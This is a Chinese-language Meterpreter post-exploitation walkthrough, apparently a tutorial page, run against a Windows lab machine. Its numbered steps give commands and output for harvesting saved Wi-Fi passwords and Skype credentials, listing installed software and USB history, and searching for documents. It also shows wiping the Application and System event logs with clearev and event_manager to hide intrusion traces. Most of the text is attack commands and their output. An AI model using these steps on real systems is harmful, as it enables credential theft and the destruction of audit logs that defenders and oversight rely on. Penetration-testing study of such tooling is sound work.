1.收集无线SSID信息
run post/windows/wlan/wlan_bss_list
meterpreter > run post/windows/wlan/wlan_bss_list
2.收集无线Wifi密码
run post/windows/wlan/wlan_profile
可以收集目标系统上保存的Wifi登录凭证。
meterpreter > run post/windows/wlan/wlan_profile
3.获取应用程序列表
run get_application_list
meterpreter > run get_application_list
[!] Meterpreter scripts are deprecated. Try post/windows/gather/enum_applications.
[!] Example: run post/windows/gather/enum_applications OPTION=value [...]
Installed Applications
======================
Name Version
---- -------
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148
Radmin Server 3.5 3.50.0000
WebFldrs XP 9.50.7523
meterpreter >
4.获取Skype密码
run post/windows/gather/credentials/skype
meterpreter > run post/windows/gather/credentials/skype
5.获取USB使用历史信息
run post/windows/gather/usb_history
meterpreter > run post/windows/gather/usb_history
[*] Running module against LIUYAZHUANG
[*]
D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
E: Disk 31ac31ab
[-] No USB devices appear to have been connected to this host.
meterpreter >
利用这个模块可以轻松的伪造USB描述符合硬件ID
6.查找文件
meterpreter > search -f *.doc
Found 6 results...
c:\Documents and Settings\Default User\Templates\winword.doc (4608 bytes)
c:\Documents and Settings\Default User\Templates\winword2.doc (1769 bytes)
c:\Documents and Settings\lyz\Templates\winword.doc (4608 bytes)
c:\Documents and Settings\lyz\Templates\winword2.doc (1769 bytes)
c:\WINDOWS\system32\config\systemprofile\Templates\winword.doc (4608 bytes)
c:\WINDOWS\system32\config\systemprofile\Templates\winword2.doc (1769 bytes)
meterpreter >
7.清除目标系统上的日志
clearev
meterpreter > clearev
[*] Wiping 190 records from Application...
[*] Wiping 286 records from System...
另一个用来处理日志的模块就是event_manager
meterpreter > run event_manager
Meterpreter Script for Windows Event Log Query and Clear.
OPTIONS:
-c <opt> Clear a given Event Log (or ALL if no argument specified)
-f <opt> Event ID to filter events on
-h Help menu
-i Show information about Event Logs on the System and their configuration
-l <opt> List a given Event Log.
-p Supress printing filtered logs to screen
-s <opt> Save logs to local CSV file, optionally specify alternate folder in which to save logs
meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration
Event Logs on System
====================
Name Retention Maximum Size Records
---- --------- ------------ -------
Application Disabled 524288K 0
Security Disabled 524288K Access Denied
System Disabled 524288K 0
ThinPrint Diagnostics Disabled K 1
meterpreter > run event_manager -c
[-] You must specify and eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] Security:
[*] Clearing Security
[-] Failed to Clear Security, Access Denied
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
[*] ThinPrint Diagnostics:
[*] Clearing ThinPrint Diagnostics
[*] Event Log ThinPrint Diagnostics Cleared!
meterpreter >
meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration
Event Logs on System